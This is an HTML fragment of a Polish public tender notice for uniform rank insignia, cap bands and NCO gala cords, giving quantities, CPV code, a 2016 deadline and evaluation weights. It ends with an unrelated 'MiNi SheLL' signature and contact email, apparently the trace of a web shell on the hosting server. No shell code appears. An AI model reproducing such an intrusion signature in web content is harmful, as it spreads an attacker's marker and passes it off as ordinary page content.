<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji	oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze czarnym) w ilości 6 200 par oraz oznak stopni do umundurowania służbowego - pochewki (haft nićmi w kolorze złotym) w ilości 600 par.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Dostawa oznak stopni do umundurowania wyjściowego - taśm otokowych w ilości 1 000 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji	oznak stopni do umundurowania wyjściowego - taśm otokowych w ilości 1 000 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Dostawa sznurów galowych podoficera w ilości 700 sztuk.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa nowych, pochodzących z bieżącej produkcji	sznurów galowych podoficera w ilości 700 sztuk.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 39.56.00.00-5.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 14.10.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Jakość - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com